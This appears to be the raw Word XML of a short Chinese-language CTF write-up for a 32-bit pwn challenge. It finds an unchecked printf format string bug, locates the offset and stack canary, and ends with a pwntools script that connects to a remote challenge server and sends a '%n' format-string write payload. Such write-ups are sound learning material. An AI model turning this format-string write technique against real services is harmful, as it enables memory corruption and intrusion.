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218" w14:textId="29C3D2CF" w:rsidR="00615A13" w:rsidRDefault="00615A13" w:rsidP="00615A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先checksec一下文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5ECA4F" wp14:editId="05B6BB1A">
            <wp:extent cx="5274310" cy="1951355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1447088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88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99BE" w14:textId="140A9CE6" w:rsidR="00615A13" w:rsidRDefault="00615A13" w:rsidP="00615A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放到32位ida看一下</w:t>
      </w:r>
      <w:r w:rsidR="00D13788" w:rsidRPr="00D13788">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7631F287" wp14:editId="4F068C2B">
            <wp:extent cx="5274310" cy="3737610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="134482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4A1E" w14:textId="582A1199" w:rsidR="00D13788" w:rsidRDefault="00D13788" w:rsidP="00D13788">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以明显看出来有一个格式化字符串的漏洞就是那个printf（s）没有检查，所以就是很简单就可以把他的偏移量算出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F376E04" w14:textId="3DF85A68" w:rsidR="00D13788" w:rsidRDefault="00D13788" w:rsidP="00D1378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看一下主播的做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA28B4" w14:textId="4EEBC59B" w:rsidR="00D13788" w:rsidRDefault="00D13788" w:rsidP="00D13788">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D13788">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4608B901" wp14:editId="15B7A49E">
            <wp:extent cx="3982102" cy="1803400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2090002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630" cy="180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1BB76" w14:textId="3609C204" w:rsidR="00D13788" w:rsidRDefault="00D13788" w:rsidP="00D13788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这样可以看到偏移量为10</w:t>
      </w:r>
      <w:r w:rsidR="002D711D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这道题还有个金丝雀我来看看他在哪</w:t>
      </w:r>
      <w:r w:rsidR="002D711D" w:rsidRPr="002D711D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F64EF17" wp14:editId="799EFD31">
            <wp:extent cx="5274310" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="448169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9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605F" w14:textId="77777777" w:rsidR="005622C0" w:rsidRDefault="002D711D" w:rsidP="002D711D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是金丝雀的位置，看到了xor和它比较的地方就是esp+8de位置，所以金丝雀就是在那那既然一切准备工作都完成了我们就可以写wp了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48916720" w14:textId="342F4D67" w:rsidR="005622C0" w:rsidRDefault="005622C0" w:rsidP="002D711D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这道题不需要canary但还是说一下怎么拿到esp是当前函数的栈顶，ebp是当前函数的栈底，然后一般找到栈溢出的地方然后算他们的偏移。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA59D4" w14:textId="199A1E84" w:rsidR="002D711D" w:rsidRDefault="002D711D" w:rsidP="002D711D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这还是我第一次独自写fmt的wp）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E329F85" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255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371E7D5F" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BC6700" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p = remote('61.147.171.103',51139)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C83B67" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799B8E12" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255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p.sendlineafter("please tell me your name:", "test")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA63676" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = p32(0x0804a068) + b"%4c%10$n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06842942" w14:textId="77777777" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255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p.sendlineafter("leave your message please:", payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E9D84" w14:textId="172F7B08" w:rsidR="00B13255" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08510C08" w14:textId="564F768B" w:rsidR="00B13255" w:rsidRPr="002D711D" w:rsidRDefault="00B13255" w:rsidP="00B13255">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打通了，我是天才</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B13255" w:rsidRPr="002D7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F0E3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C48A7B7C"/>
    <w:lvl w:ilvl="0" w:tplc="451A629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115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13"/>
    <w:rsid w:val="002D711D"/>
    <w:rsid w:val="005622C0"/>
    <w:rsid w:val="00615A13"/>
    <w:rsid w:val="008E2E72"/>
    <w:rsid w:val="00B13255"/>
    <w:rsid w:val="00D13788"/>
    <w:rsid w:val="00F2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33319"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{001F0DA2-4679-47E9-B110-76EBDDC6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5A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A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A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A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A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A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A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A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A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5A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A1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5A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A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A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A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5A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A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A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A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A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A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A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174</Words>
  <Characters>336</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>18</Lines>
  <Paragraphs>15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2025-10-23T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-23T13:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>